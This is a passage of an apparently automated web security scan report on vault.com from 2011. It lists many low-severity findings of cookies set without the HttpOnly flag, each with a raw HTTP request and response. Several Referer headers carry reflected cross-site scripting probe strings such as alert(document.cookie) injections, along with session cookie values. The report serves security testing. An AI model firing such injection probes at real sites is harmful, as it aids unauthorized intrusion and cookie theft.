...[SNIP]...

10.212. http://www.vault.com/scripts/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery-1.3.2.min.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:21 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 27 Aug 2009 19:17:42 GMT
ETag: "b184e6-dfa6-6bee2180"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:24 GMT;path=/
Content-Length: 57254

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

10.213. http://www.vault.com/scripts/jquery.DOMWindow.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/jquery.DOMWindow.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery.DOMWindow.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:24 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 09 Feb 2010 21:21:33 GMT
ETag: "e0b73-3e4d-80827140"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:28 GMT;path=/
Content-Length: 15949

(function($){
   
   //closeDOMWindow
   $.fn.closeDOMWindow = function(settings){
       
       if(!settings){settings={};}
       
       var run = function(passingThis){
           
           if(settings.anchoredClassName){
               var $anch
...[SNIP]...

10.214. http://www.vault.com/scripts/jquery.autocomplete.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/jquery.autocomplete.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery.autocomplete.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:22 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 14 Sep 2009 14:07:01 GMT
ETag: "b18355-413c-2dfbcb40"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:26 GMT;path=/
Content-Length: 16700

jQuery.autocomplete = function(input, options) {
   // Create a link to self
   var me = this;

   // Create jQuery object for input element
   var $input = $(input).attr("autocomplete", "off");

   // A
...[SNIP]...

10.215. http://www.vault.com/scripts/jquery.carousel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/jquery.carousel.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery.carousel.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:24 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 10 Sep 2009 13:35:36 GMT
ETag: "b18353-1bf5-46437a00"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:28 GMT;path=/
Content-Length: 7157

/**
* * * Carousel object
* Carousel.left = initial LEFT css property of the sliding container.
* Carousel.links = array of carousel carousel items
* Carousel.numImages = number of items that
...[SNIP]...

10.216. http://www.vault.com/scripts/jquery.popupWindow.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/jquery.popupWindow.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery.popupWindow.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:22 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 19 Mar 2010 20:46:52 GMT
ETag: "e0b7b-bdc-72712700"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:26 GMT;path=/
Content-Length: 3036

(function($){        
   $.fn.popupWindow = function(instanceSettings){
       
       return this.each(function(){
       
       $(this).click(function(){
       
       $.fn.popupWindow.defaultSettings = {
           centerBrowser:0, // cen
...[SNIP]...

10.217. http://www.vault.com/scripts/jquery.stylish-select.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/jquery.stylish-select.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery.stylish-select.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:24 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 20 Aug 2010 13:11:40 GMT
ETag: "e0053-11f5-a14db00"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:28 GMT;path=/
Content-Length: 4597

/*
Stylish Select 0.4.1 - $ plugin to replace a select drop down box with a stylable unordered list
http://scottdarby.com/

Requires: jQuery 1.3 or newer

Contributions from Justin Beasley: ht
...[SNIP]...

10.218. http://www.vault.com/scripts/jquery.swapimage.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/jquery.swapimage.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery.swapimage.min.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:22 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 24 Mar 2009 17:37:16 GMT
ETag: "b184e1-9a1-d5822b00"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:25 GMT;path=/
Content-Length: 2465

/**
* swapImage - jQuery plugin for swapping image
*
* Copyright (c) 2008 tszming (tszming@gmail.com)
*
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses
...[SNIP]...

10.219. http://www.vault.com/scripts/main.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/main.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/main.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:21 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 23 Dec 2010 14:12:44 GMT
ETag: "e0962-e88d-76a2ef00"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:24 GMT;path=/
Content-Length: 59533

/** Popup Window **/
var jsurl = '/scripts/jquery.popupWindow.js';
document.write('<script src="' + jsurl + '" type="text/javascript"></script>');

String.prototype.trim = function() {
   return
...[SNIP]...

10.220. http://www.vault.com/scripts/membership.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/membership.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/membership.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:12 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 04 Mar 2010 15:46:07 GMT
ETag: "e0b77-127c-7f41adc0"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:16 GMT;path=/
Content-Length: 4732


function ChangeDisplay(id, attribute) {        
   document.getElementById(id).style.display = attribute;
}

function ChangeCssClass(id, CssClass) {        
   id.className = CssClass;
}

function ChangeB
...[SNIP]...

10.221. http://www.vault.com/scripts/swfobject.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/swfobject.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:24 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 25 Aug 2009 14:42:32 GMT
ETag: "b184e5-344d-582cc600"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:28 GMT;path=/
Content-Length: 13389

/**
* SWFObject v1.5.1: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.open
...[SNIP]...

10.222. http://www.vault.com/scripts/time-tracker.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/time-tracker.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/time-tracker.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:24 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 06 Jan 2011 20:40:00 GMT
ETag: "e0b4e-e10-81636800"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:28 GMT;path=/
Content-Length: 3600

// Copyright 2007 Google, Inc.
// This sample code is under the Apache2 license, see
// http://www.apache.org/licenses/LICENSE-2.0 for license details.
/**
* @fileoverview Wrapper for Time Tracki
...[SNIP]...

10.223. http://www.vault.com/scripts/vault_header.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/vault_header.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/vault_header.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:24 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 11 Jan 2011 17:21:54 GMT
ETag: "e039c-2af1-52225080"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:28 GMT;path=/
Content-Length: 10993

//window.onload = searchSite;

$(function(){
   searchSite();
});

function searchSite(){
   document.getElementById("searchSite").style.color="#cb7303";
   document.getElementById("searchCompanies").style.
...[SNIP]...

10.224. http://www.vault.com/styles/buttons.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /styles/buttons.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/buttons.css HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:10 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 08 Sep 2010 14:10:39 GMT
ETag: "a525b0-16c7-1401d5c0"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/css
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:14 GMT;path=/
Content-Length: 5831

@charset "utf-8";
/* CSS Document */

/* white background with color text */


input.btn1, a.btn1 {
   background:white; /* white background */
   border:1px solid #027AA7; /* darker blue */
   color:#027AA
...[SNIP]...

10.225. http://www.vault.com/styles/home.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /styles/home.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/home.css HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:21 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 07 Sep 2010 17:55:02 GMT
ETag: "a525ed-26af-189f8980"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/css
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:24 GMT;path=/
Content-Length: 9903

@charset "utf-8";
/* CSS Document */

.content-small div.green {
border-top: solid 4px #339900; /* green */
}

/* Flash Intro */

#flashcontent {
   float:left;
   margin-bottom:10px;
   widt
...[SNIP]...

10.226. http://www.vault.com/styles/jquery.autocomplete.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /styles/jquery.autocomplete.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/jquery.autocomplete.css HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:36:10 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 07 Sep 2010 17:55:02 GMT
ETag: "a525dc-33b-189f8980"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/css
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:14 GMT;path=/
Content-Length: 827

.ac_results {
   padding: 0px;
   border: 1px solid WindowFrame;
   background-color: Window;
   overflow: hidden;
}

.ac_results ul {
   width: 100%;
   list-style-position: outside;
   list-style: none;
...[SNIP]...

10.227. http://www.vault.com/styles/law-rankings.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /styles/law-rankings.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /styles/law-rankings.css HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
